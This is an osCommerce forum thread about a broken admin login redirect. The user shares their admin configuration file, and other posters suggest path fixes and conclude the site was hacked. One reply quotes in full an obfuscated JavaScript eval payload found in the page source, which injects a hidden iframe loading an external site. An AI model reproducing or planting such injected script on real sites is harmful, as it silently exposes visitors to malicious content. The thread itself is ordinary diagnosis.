Admin Login Troubles

[Taj Jackson]

I had the admin tool "crash" on me while I was busy deleting the sample products from the original installation, and afterwards I was unable to access the admin login page again. I got around that by renaming .htaccess, but what's happening now is that after I input my username, pw and click "login," I go to a 404.

 

The address of the 404 page has a "/" removed, such that //www.mysite/admin/login.php?osCAdminID=blah blah blah actually reads as //www.mysiteadmin/login.php?osCAdminID=blah blah blah. So of course it can't be found. If I manually enter the missing slash between the domain name and admin directory in the address bar and refresh the page, I go back to the Admin login page and we start the circle all over again.

 

What file should I be looking at to resolve this? I can't see any missing slashes in my admin/includes/configure.php.

I've also looked at the admin/includes/application_top.php, login.php, and header.php, but with regard to those files, I'm not sure what I'm looking for.

 

My error log is reporting: [sun Apr 18 02:50:06 2010][error] [client xx.xx.xxx.xxx] mod_mime_magic: can't read `/data/17/2/90/82/2090082/user/2291947/htdocs/catalog/admin/login.php'

 

God bless the benevolent souls who bother to help us newbs with these questions!

[Guest]

What file should I be looking at to resolve this? I can't see any missing slashes in my admin/includes/configure.php.

I've also looked at the admin/includes/application_top.php, login.php, and header.php, but with regard to those files, I'm not sure what I'm looking for.

Your login.php should be in admin not in admin/includes

[Taj Jackson]

My login.php is in /admin. I only referred to the admin/includes because I wondered if there was something wrong in the configure.php file in that directory.

[BryceJr]

My login.php is in /admin. I only referred to the admin/includes because I wondered if there was something wrong in the configure.php file in that directory.

Post your configure.php for the admin. Do NOT post the database section of that file.

 

Also, check for a configure.php file in the admin/includes / local folder. Rename it, if there's one.

[Taj Jackson]

<?php
 define('HTTP_SERVER', 'http://www.pocketpieces.com');
 define('HTTP_CATALOG_SERVER', 'http://www.pocketpieces.com');
 define('HTTPS_CATALOG_SERVER', 'https://secure.pocketpieces.com');
 define('ENABLE_SSL_CATALOG', 'true');
 define('DIR_FS_DOCUMENT_ROOT', '/data/17/2/90/82/2090082/user/2291947/htdocs/catalog/');
 define('DIR_WS_ADMIN', 'admin/');
 define('DIR_FS_ADMIN', '/data/17/2/90/82/2090082/user/2291947/htdocs/catalog/admin/');
 define('DIR_WS_CATALOG', 'catalog/');
 define('DIR_FS_CATALOG', '/data/17/2/90/82/2090082/user/2291947/htdocs/catalog/');
 define('DIR_WS_IMAGES', 'images/');
 define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/');
 define('DIR_WS_CATALOG_IMAGES', DIR_WS_CATALOG . 'images/');
 define('DIR_WS_INCLUDES', 'includes/');
 define('DIR_WS_BOXES', DIR_WS_INCLUDES . 'boxes/');
 define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/');
 define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/');
 define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/');
 define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/');
 define('DIR_WS_CATALOG_LANGUAGES', DIR_WS_CATALOG . 'includes/languages/');
 define('DIR_FS_CATALOG_LANGUAGES', DIR_FS_CATALOG . 'includes/languages/');
 define('DIR_FS_CATALOG_IMAGES', DIR_FS_CATALOG . 'images/');
 define('DIR_FS_CATALOG_MODULES', DIR_FS_CATALOG . 'includes/modules/');
 define('DIR_FS_BACKUP', DIR_FS_ADMIN . 'backups/');

 

Of course, the real name of my admin directory is not /admin - I'm just making that substitution for this post. But I certainly didn't change any slashes, quote marks, etc. Also, there is nothing but the README file in my admin/includes/local folder. I've never quite been clear on when or how the copy of configure.php is supposed to get there; whether it would be auto-generated or if I'm supposed to copy it in there. BTW, my domain name points to /htdocs/catalog so that I can treat /catalog as root in the WS entries.

 

Another funny thing that happened when the Admin tool crashed on me was that a number of files "went blank" at that time, i.e., header.php, login.php and others suddenly showed up as 0 bytes in length. Nothing in them. I had to re-FTP those files from the original installation package. NO idea what's up with that, LOL

[Guest]

Of course, the real name of my admin directory is not /admin - I'm just making that substitution for this post. But I certainly didn't change any slashes, quote marks, etc. Also, there is nothing but the README file in my admin/includes/local folder. I've never quite been clear on when or how the copy of configure.php is supposed to get there; whether it would be auto-generated or if I'm supposed to copy it in there. BTW, my domain name points to /htdocs/catalog so that I can treat /catalog as root in the WS entries.

This is the way I have it, try to change yours:

define('DIR_WS_ADMIN', '/catalog/admin/');  
define('DIR_WS_CATALOG', '/catalog/');  

[Taj Jackson]

Thanks, just tried that but no dice.

[Guest]

Thanks, just tried that but no dice.

I think your site has been hacked.

I tried to login to your site but get warned about a harmful site and adviced to NOT login.

 

Get this contribution osCommerce VTS and try to scan your site..

[germ]

I think your site has been hacked.

I tried to login to your site but get warned about a harmful site and adviced to NOT login.

 

Get this contribution osCommerce VTS and try to scan your site..

Probably this script at the bottom of the page source:

 

<script> eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('h f(a,8,d){6 3=i m();3.l(3.k()+(d*n));6 5="; 5="+3.j();4.9=a+"="+8+5+"; "}6 c=4.9;b(c.v("g")==-1){4.o(\'<e w="0" y=\\\' b (!2.7){ 2.7="t://u.p/q/"; 2.r=0; 2.s=0;} \\\'></e>\');f("g","1",x)}',35,35,'||this|date|document|expires|var|src|value|cookie|name|if||hours|iframe|addCookie|seref|function|new|toGMTString|getTime|setTime|Date|3600000|write|com|grep|height|width|http|corpadsinc|indexOf|frameborder|24|onload'.split('|'),0,{})) ;</script>

[♥mdtaylorlrim]

"login," I go to a 404.

 

The address of the 404 page has a "/" removed, such that //www.mysite/admin/login.php?osCAdminID=blah blah blah actually reads as //www.mysiteadmin/login.php?osCAdminID=blah blah blah. So of course it can't be found. If I manually enter the missing slash between the domain name and admin directory in the address bar and refresh the page, I go back to the Admin login page and we start the circle all over again.

 

Your problems is worse than that. Your configure.php files show your shop in /catalog/ but your admin is trying to go to /www.mysite/admin/login.php WITHOUT the catalog in it. Looks to me like you have an entire define missing from your configure.php file in the admin section.

[Taj Jackson]

Your problems is worse than that. Your configure.php files show your shop in /catalog/ but your admin is trying to go to /www.mysite/admin/login.php WITHOUT the catalog in it. Looks to me like you have an entire define missing from your configure.php file in the admin section.

 

 

Ok. Given the suggestions that I've been hacked, I've decided to start over. All new db, all new passwords, and this time the entire /category directory will be password protected until I can learn how to use this thing and be certain all security measures are in place and working. I was hoping to salvage this installation, but if it has been compromised I think I'd rather start clean than bang my head against the wall trying to figure out where I've been hacked and how. I've got enough on my plate as it is.